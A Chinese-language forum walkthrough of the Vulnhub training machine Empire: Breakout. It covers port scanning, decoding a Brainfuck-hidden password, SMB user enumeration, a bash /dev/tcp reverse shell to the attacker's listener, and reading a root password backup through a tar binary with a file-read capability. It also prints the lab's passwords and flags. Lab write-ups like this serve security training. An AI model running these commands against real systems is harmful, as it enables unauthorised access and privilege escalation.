Vulnhub 靶机篇:Empire Breakout
## 0x01 靶机信息
> - **名称**:Empire:Breakout
> - **发布日期**:2021 年 10 月 21 日
> - **作者**:icex64 & Empire Cybersecurity
> - **系列**:Empire
> - **难度**:简易
> - **简介**:这个盒子被设计成一个简单的盒子,但如果你迷路了,它也可以是中等的。
> - **下载链接**: [https://download.vulnhub.com/empire/02-Breakout.zip](https://download.vulnhub.com/empire/02-Breakout.zip)
> - **MD5**:C87BC1DB9BD51205B1E9EA441F8222AB
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 主机扫描
``` text
nbtscan -r 192.168.181.0/24
```
扫描到目标ip:192.168.181.141
!(data/attachment/forum/202404/08/192946mp56ge5552o5652g.png)
### 2.2 扫描目标服务端口
``` text
amap -Aq 192.168.181.141 1-65535
-A 启用主机发现和操作系统版本检测功能,-q 不返回失败信息
```
发现目标机开放了80,10000,20000,139,445端口
对应开放的服务:http,smb,mysql
!(data/attachment/forum/202404/08/193011rboorbbrjnktljbb.png)
### 2.3 访问网站
80端口是服务器默认页面
!(data/attachment/forum/202404/08/193021qh0m35pkxxz31x8x.png)
访问10000端口,提示用https
!(data/attachment/forum/202404/08/193035cp8p3rmuehrkmqp3.png)
10000端口是一个管理平台登录页面
!(data/attachment/forum/202404/08/193044iv6r5ebcdvrrus66.png)
20000端口同理https访问,也是一个管理页面
!(data/attachment/forum/202404/08/193051xme6m66v3zcqojuz.png)
观察index.html默认页面
!(data/attachment/forum/202404/08/193115ihilwinvylyzptuz.png)
查看源代码,发现了一条密文
!(data/attachment/forum/202404/08/193124l6uhhfyecyn6suu2.png)
``` text
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
翻译:不用担心没有人会到达这里,与您分享我的访问权限是安全的。它是加密的:)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
```
将这段brainfuck加密的密文解密
!(data/attachment/forum/202404/08/193135usztlqf7hdhdyoy8.png)
``` text
.2uqPEfj3D<P'a-3
```
根据之前源代码中提到的分享权限,可以判断这是一个访问权限的密码
我们还差一个用户名,可以利用开放的smb服务尝试扫描
### 2.4 enum4linux 扫描smb服务
``` text
enum4linux -Ur 192.168.181.141
-U 列举用户,-r RID循环枚举用户
```
得到用户名cyber
!(data/attachment/forum/202404/08/193145s0utll0bbkzopv8t.png)
利用用户cyber,密码.2uqPEfj3D<P'a-3登录
!(data/attachment/forum/202404/08/193153poikbkiswsstqtkk.png)
登录失败
!(data/attachment/forum/202404/08/193202yi2ztehlqklw388j.png)
尝试20000端口的管理页面,登录成功
在页面下方发现了终端图标
!(data/attachment/forum/202404/08/193210xgeep1p8fplabf3p.png)
获得终端
!(data/attachment/forum/202404/08/193219z8kf8pszc33fklqa.png)
### 2.5 反弹shell
``` text
nc -lvvp 4444
kali开启侦听4444端口
```
!(data/attachment/forum/202404/08/193229bp6dqbpfxbebrfpb.png)
目标机反弹shell
``` text
bash -i >& /dev/tcp/192.168.181.136/4444 0>&1
```
!(data/attachment/forum/202404/08/193239onpoxc4corrkcddn.png)
查看目录,发现user.txt文件
!(data/attachment/forum/202404/08/193249li7rnp1t1u78izx8.png)
```text
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
翻译:你设法破坏了我的安全访问
```
这是cyber用户的flag
查看目录下文件权限,发现可执行文件tar,用getcap进一步查看权限
``` text
getcap tar
查看文件的capabilities(能力)
```
查看后发现文件拥有CAP_DAC_READ_SEARCH(忽略文件读及目录搜索的DAC访问限制)
意思是我们可以用tar来获取读取权限
!(data/attachment/forum/202404/08/193301kyw8by1f6966cckc.png)
查找敏感文件
``` text
find / -name "*pass*" 2>/dev/null
```
在/var/backups目录下发现.old_pass.bak文件
!(data/attachment/forum/202404/08/193309uueunmmnz7ms4smu.png)
只有root用户有权限
!(data/attachment/forum/202404/08/193318gcn0fn8gncnn44ik.png)
### 2.6 利用tar命令的功能属性读取文件
``` text
./tar -cf passwd.tar /var/backups/.old_pass.bak
./tar利用家目录那个有权的tar命令执行,-c创建,-f指定文件
tar -xf passwd.tar
-x 解压,-f 指定文件
```
!(data/attachment/forum/202404/08/193328mt0iecseaewjaivz.png)
发现密码Ts&4&YurgtRX(=~h
!(data/attachment/forum/202404/08/193338tzcoh2h89a8zqnau.png)
### 2.7 提权
利用获取的密码登录root
!(data/attachment/forum/202404/08/193346nabjkhmnsk7okggh.png)
成功获取最终flag
``` text
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
翻译:恭喜你成功逃离我的系统
```
页:
[1]